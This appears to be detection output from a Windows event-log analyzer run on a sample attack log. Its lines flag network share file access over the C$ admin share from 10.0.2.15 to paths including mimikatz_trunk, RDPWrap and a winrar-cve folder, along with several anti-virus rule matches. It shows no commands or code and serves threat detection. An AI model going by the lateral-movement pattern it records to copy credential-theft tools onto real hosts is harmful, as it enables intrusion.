+2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\New folder | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\RDPWrap-v1.6.2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\translations | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\db | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\garbage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\db | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\winrar-cve | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
